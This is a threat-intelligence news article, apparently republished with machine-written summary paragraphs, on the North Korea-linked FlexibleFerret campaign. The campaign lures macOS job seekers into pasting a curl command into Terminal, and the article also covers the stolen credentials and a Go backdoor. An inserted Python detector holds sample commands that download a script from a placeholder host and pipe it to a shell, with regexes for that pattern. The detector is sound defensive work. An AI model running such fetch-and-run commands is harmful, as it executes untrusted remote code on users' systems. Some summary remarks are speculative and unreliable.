LmCast :: Stay tuned in

DPRK's FlexibleFerret Tightens macOS Grip

Recorded: Nov. 26, 2025, 1:06 a.m.

Original Summarized

Cyberattacks & Data Breaches | Threat Intelligence | News

DPRK's FlexibleFerret Tightens macOS Grip

The actor behind the "Contagious Interview" campaign is continuing to refine its tactics and social engineering scams to wrest credentials from macOS users.

Jai Vijayan, Contributing Writer
November 25, 2025
3 Min Read

The North Korea-linked operators of a malware family known as FlexibleFerret are continuing to refine and adapt their credential-theft campaign targeting macOS users using fake job-recruitment workflows.

A recent analysis of the campaign by Jamf Threat Labs showed the threat actor using increasingly convincing-looking recruitment lures to trick users into executing malicious commands in Terminal, macOS's command-line interface.

Contagious Interview Campaign

Jamf's analysis found the threat actor deploying an updated shell loader featuring architecture-aware logic (Intel or Apple silicon), decoy applications, and a more reliable persistence mechanism in recent attacks. Also updated is a Go-based backdoor with support for more commands, improved data-exfiltration capabilities and a cleaner structure compared with samples in prior campaigns.

Previous reports from other security vendors and researchers, including SentinelOne and Validin, have tied FlexibleFerret to a DPRK-aligned actor responsible for "Contagious Interview," a scam where targets are walked through hiring steps that eventually lead them into executing malware on their systems.

"This campaign reinforces that FlexibleFerret remains an active threat on macOS, relying on convincing recruitment lures to move targets from a fake hiring flow into running attacker-provided commands in the Terminal that circumvent built-in protections like Gatekeeper," Jamf said in a report this week.

Central to the ongoing campaign are multiple recruitment-themed web pages designed to mimic legitimate "hiring assessment portals." One example domain in Jamf's report is evaluza dot com, which presents applicants with what looks like a formal online evaluation for roles such as "Blockchain Capital Operations Manager." A JavaScript stager dynamically selects job titles and company names from a predefined list so that the page appears customized for every visitor, according to Jamf. The site then asks the user to complete a video introduction or similar task before requesting the target to run a Terminal command to fix a nonexistent camera or microphone access issue.

Bypassing Built-in Protections

To bypass built-in macOS safeguards and application-verification mechanisms, the threat actor persuades the users themselves to manually paste a curl command in Terminal that triggers the infection process. Once launched, the shell script determines whether the system on which it has landed is based on an Intel or Apple CPU and then fetches the appropriate second-stage payload.

One new tactic that Jamf discovered the DPRK actor using is a signed decoy application, dubbed MediaPatcher.app, that when opened pops up a fake macOS-style request for camera permissions, followed by a Chrome-like system password prompt. In the background, the malicious app collects credentials and exfiltrates them to a Dropbox account.

The Go language-based backdoor itself is the final-stage payload. Its function is to contact a hard-coded command-and-control (C2) server and to receive and execute malicious commands on behalf of the attacker. Jamf found the backdoor capable of handling more commands than previous versions, including collecting system information, uploading and downloading files, harvesting data from the browser, and extracting keychain information.

The FlexibleFerret campaign is a reminder of how macOS users, especially those seeking jobs, are a prime target for credential theft via social-engineering campaigns. It highlights how threat actors are attempting to skirt built-in system protections against malicious files by getting users to directly install and run them.

"Our analysis links the JavaScript stagers to a familiar multistage attack and shows that the threat actor continues refining their social engineering to blend into legitimate-looking processes," Jamf said. "Organizations should treat unsolicited 'interview' assessments and Terminal-based 'fix' instructions as high risk and ensure users know to stop and report these prompts as they continue to become more abundant in the threat landscape."

About the Author

Jai Vijayan, Contributing Writer

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

The North Korea-linked operators of the FlexibleFerret malware are continuing to refine their social engineering tactics to steal macOS user credentials. According to a recent analysis by Jamf Threat Labs, this actor, connected to the "Contagious Interview" campaign, employs increasingly convincing job recruitment lures to trick users into executing malicious commands within macOS's Terminal interface, bypassing built-in protections like Gatekeeper. The core of the campaign involves mimicking legitimate "evaluation portals," such as evaluza.com, which present applicants with what appears to be a formal online assessment for roles like "Blockchain Capital Operations Manager." Users are prompted to complete video introductions or tasks and are then instructed to run Terminal commands, often framed as fixes for camera or microphone issues, which trigger the infection process. Jamf's research indicates that this approach directly circumvents macOS security measures.
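The user-pasted "curl into Terminal" step is the most detectable part of the chain described above. The following added example (not Jamf's or the article's code) shows how a defender could flag that pattern in process-start telemetry; the event records and the EDR-style field names (id, parent, cmdline) are constructed for the demo and do not reflect any real product's schema.

```python
import re

# Constructed sample process-start events (hypothetical EDR-style records,
# not a real product's schema): the lure's "fix" commands plus benign noise.
SAMPLE_EVENTS = [
    {"id": "e1", "parent": "Terminal",
     "cmdline": 'bash -c "curl -fsSL https://example.invalid/cam-fix.sh | bash"'},
    {"id": "e2", "parent": "Terminal",
     "cmdline": 'zsh -c "$(curl -s https://example.invalid/mic-fix)"'},
    {"id": "e3", "parent": "Terminal",
     "cmdline": "curl -O https://example.invalid/report.pdf"},
    {"id": "e4", "parent": "Xcode",
     "cmdline": 'sh -c "cat build.log | grep error"'},
]

# Interactive terminal apps: a hit whose parent is one of these was typed or
# pasted by the user, which is exactly what the recruitment lure asks for.
TERMINAL_APPS = {"Terminal", "iTerm2"}

# Form 1: a download piped straight into a shell, optionally through sudo.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")
# Form 2: a download substituted into a shell argument, e.g. sh -c "$(curl ...)".
SUBST_TO_SHELL = re.compile(r"\b(?:sh|bash|zsh)\b[^$]*\$\(\s*(?:curl|wget)\b")


def classify_cmdline(cmdline):
    """Return which download-to-shell form the command line uses, or None."""
    if PIPE_TO_SHELL.search(cmdline):
        return "pipe-to-shell"
    if SUBST_TO_SHELL.search(cmdline):
        return "command-substitution"
    return None


def flag_events(events):
    """Return one alert per event that executes a freshly downloaded script."""
    alerts = []
    for ev in events:
        form = classify_cmdline(ev["cmdline"])
        if form is None:
            continue
        alerts.append({
            "id": ev["id"],
            "form": form,
            # True when launched from an interactive terminal: the user-pasted
            # pattern that the fake "camera/microphone fix" instructions rely on.
            "user_pasted": ev["parent"] in TERMINAL_APPS,
        })
    return alerts
```

A plain download (e3) or an ordinary shell pipeline without curl/wget (e4) is deliberately not flagged, so the rule keys on the combination that the lure needs rather than on curl alone.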

The FlexibleFerret campaign shows attackers adapting their methods to exploit human behavior rather than software flaws, which makes vigilance especially important for users engaged in online job searches. The threat actor runs a multistage attack and keeps enhancing its social engineering. Jamf's analysis links the JavaScript stagers to this established campaign, demonstrating an ongoing and adaptive threat whose refinements are aimed at manipulating user trust and getting users to bypass security protections themselves.

A core element of the FlexibleFerret operation involves a Go-based backdoor, which has been upgraded with increased command capabilities. This updated backdoor possesses functionality to handle more commands than previous versions, including information harvesting, file transfers, browser data collection, and keychain information extraction. This enhanced capability underscores the sophistication of the threat actor’s toolset and their ability to gather valuable data from compromised systems. The Go language’s efficiency and security features have likely played a role in this development.

Jamf also observed the actor deploying a signed decoy application named MediaPatcher.app. When opened, this application convincingly requests camera permissions and then prompts for a macOS-style system password, while collecting credentials in the background and exfiltrating them to a Dropbox account. This multi-layered approach reflects an iterative strategy, learning from previous attempts, to maximize the chance of success. The application's deliberate mimicry of macOS system prompts is a key element of its deception.

The FlexibleFerret campaign serves as a compelling reminder of the ongoing challenges in cybersecurity, particularly the vulnerability of users to sophisticated social engineering attacks. Organizations should treat unsolicited "interview" assessments and Terminal-based "fix" instructions with extreme caution. Jamf’s analysis explicitly recommends that organizations treat these prompts as high-risk, emphasizing the need for user education and robust security monitoring. The ongoing refinement of FlexibleFerret’s tactics and continuous adaptation of these methods suggests that users are increasingly susceptible to these scams.